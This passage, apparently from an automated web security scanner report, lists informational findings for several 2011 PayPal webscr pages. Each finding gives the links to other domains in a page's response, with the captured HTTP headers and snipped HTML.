<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/global.css"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/flows/flowAuthentication.css">

<link media="print" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/print.css"><style type="text/css">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"></head>
...[SNIP]...
<h1><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/paypal_x_logo_200x38.gif" alt="PayPal Platform logo"></h1>
...[SNIP]...
<p class="returnLink">Return to <a href="https://www.x.com/index.jspa?ssocancel=true&token=HA-KJ8ZLGBZ3CZ96">x.com</a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.9. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/cgi-bin/webscr?cmd=_home-customer&nav=1

The response contains the following links to other domains:

https://ad.yieldmanager.com/pixel?id=707657&t=2
https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://secure.leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=paypal100_cs=%5B+%5D5&betq=12413=%5B+%5D429889
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif
https://www.googleadservices.com/pagead/conversion/1048257392/?label=CeoiCIiS6gEQ8Mbs8wM&guid=ON&script=0
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/home0311.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.x.com/

Request

GET /cgi-bin/webscr?cmd=_home-customer&nav=1 HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:46:57 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-customer; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=1.0; expires=Thu, 07-Aug-2031 13:46:58 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2014%20_home-customer%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2052%20xpt%2fMarketing_CommandDriven%2fhomepage%2fIndividualsHome%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2059%20Send%20Money%2c%20Pay%20Online%2c%20and%20Receive%20Money%20-%20all%20with%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26030

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="all" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/home0311.css">

<link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"></head>
...[SNIP]...
ps://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=51636&bn=AjYsXGN-AwIQBgQUWBQBSiY6JA8&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFXw><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg' border='0' alt=''/></a>
...[SNIP]...
</div><img src="https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif" border="0" class="dottedline" alt=""><p class="acceptCredit">
...[SNIP]...
://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=51742&bn=AjYsXGN-AwIQBgQUWBQBSiY6JA8&s=NAo3MxA&landing_url=ORAcFjANQkkYFAsRXxhDBwsxIAs1PQs6WComAnYpDkYODGhrbAp8eEVVZgxhXmZeYVdYS3IH><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif ' border='0' alt=''/></a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
<a target="_blank" href="https://www.paypal.com/cgi-bin/webscr?cmd=xpt/Customer/popup/SecurityKeyVIP-outside" onClick="PAYPAL.core.openWindow(event, {width: 425, height: 350})"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif" alt=""></a>
...[SNIP]...
<noscript><img height="1" width="1" src="https://ad.yieldmanager.com/pixel?id=707657&t=2" border="0" alt=""><img height="1" width="1" src="https://www.googleadservices.com/pagead/conversion/1048257392/?label=CeoiCIiS6gEQ8Mbs8wM&guid=ON&script=0" border="0" alt=""><img height="1" width="1" src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=paypal100_cs=%5B+%5D5&betq=12413=%5B+%5D429889" border="0" alt=""></noscript>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.10. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/cgi-bin/webscr?cmd=_upgrade-interest-marcom&outside=1

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/global.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/print.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/logo/verisign.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.x.com/

Request

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:46:58 GMT
Server: Apache
Set-Cookie: navcmd=_upgrade-interest-marcom; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:46:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: pNTcMTtQfrJuaJiwEnWXQ6yNxfq=CzR4D18pRWB4T-AHWcsONgX47MNu_8md9Zxi7fY6KUFBjHDPgxRKVvRIbXjd41k0mClxW3OZ8KB9UZljbBzwrjPcjSKmvqsmGuU1dIckcR5AfV0kUrW0aSaqRdAZd1uGTXze7rhRVVAb6B5uFq_5QDn0FKVzaRDuole1p49SU5N7gbZbEY7lQQ46CCEvbcc-9ibfBzgkHj4LPDl0zcoeKIGZ3W_ES2MHnqJvm8zvs-3cgJj7SOzzPbHXjGsuYoEDZwE2KOHtq_mzl3i0z_RnHsl6qZsKDfNuPxCssDZekfznrtwcVb_OeYCq2YD9tVmszj5svjT_eu7hylyZ7VyoPot1W4x9ityAFRhfj2bJnZ24IMT5BJtjaknzGibF7Ok5Zp5z4NOh_dMUCdaMxM5yE-82JS8m2PsOo-nujGbkb3aUHY-n2EPs9sua94Zjt-t1CaRvj9T5Q1PSBGJZIEOXMtepQmkAGBZsLRCEknzTTtcbv0tBWCPHm38u4-PCdXgPv6ZEFAAkiLvdKnx4FN3Ts-Oxm2llgh6GnMtMf0bCX-fXlcmROOQU1vidv3GJ2aXLP17cucV3KMuF3WZoCxClQmngOWdlg0M74Z0iPzG79BBxTIYrOwa85sY6Jogir3FVf6Q8A0; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2024%20_upgrade-interest-marcom%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2034%20xpt%2fCustomer%2ffunds%2fSystemDownError%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2029%20Enrollment%20is%20closed%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Cache-Control: must-revalidate, proxy-revalidate, no-cache
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15729

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/global.css">

<link media="print" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/print.css"><style type="text/css" id="antiClickjack">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"></head>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
</script><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/verisign.gif" alt=""><script type="text/javascript">
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.11. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/cgi-bin/webscr?cmd=_login-run

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/global.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/print.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/flows/flowHFR.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/pages/pageLogin.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/hostedpayments/hostedpayments.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/icon/secure_lock_2.gif
https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/js/tns/min/bid.js
https://www.x.com/

Request

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:55:43 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_login-run; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=yYHKat1b2bdfWWzVl7sMExYgVP2e3kDJS3z1gTajBzDoQNNh3OjK-k4vNLjqYwAmv7DuXn6iqiXgx42wKn79d2MNsue4zirvudkutaV4aor5WmJs_Q6TEjl1wbQyfCt09THCD0%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313114143; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 01:55:44 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2010%20_login-run%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2011%20p%2fgen%2flogin%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2014%20Login%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 18785

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/global.css"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/pages/pageLogin.css"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/flows/flowHFR.css">

<link media="print" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/print.css"><style type="text/css">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"></head>
...[SNIP]...
</span> <img src="https://www.paypalobjects.com/en_US/i/icon/secure_lock_2.gif" border="0" alt=""></div>
...[SNIP]...
<a href=https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49773&bn=HQsPRgpZ&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFV3E><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg' border='0' alt=''/></a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
<a target="_blank" href="https://www.paypal.com/cgi-bin/webscr?cmd=xpt/Customer/popup/SecurityKeyVIP-outside" onClick="PAYPAL.core.openWindow(event, {width: 425, height: 350})"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif" alt=""></a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/hostedpayments/hostedpayments.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.12. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/cgi-bin/webscr?cmd=_home-general&nav=0

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/js/tns/min/bid.js
https://www.x.com/

Request

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:46:38 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:46:39 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2013%20_home-general%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2045%20xpt%2fMarketing_CommandDriven%2fhomepage%2fMainHome%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2063%20Send%20Money%2c%20Pay%20Online%20or%20Set%20Up%20a%20Merchant%20Account%20with%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24762

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="all" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css">

<link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"></head>
...[SNIP]...
href=https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49775&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUw><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg' border='0' alt=''/></a>
...[SNIP]...
</div><img src="https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif" border="0" class="dottedline" alt=""><p class="acceptCredit">
...[SNIP]...
href=https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49777&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUQ><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif' border='0' alt=''/></a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
<a target="_blank" href="https://www.paypal.com/cgi-bin/webscr?cmd=xpt/Customer/popup/SecurityKeyVIP-outside" onClick="PAYPAL.core.openWindow(event, {width: 425, height: 350})"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif" alt=""></a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.13. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/cgi-bin/webscr?cmd=_pp-redir&id=MDBNLCMADMUSEYPA

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/paypal.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
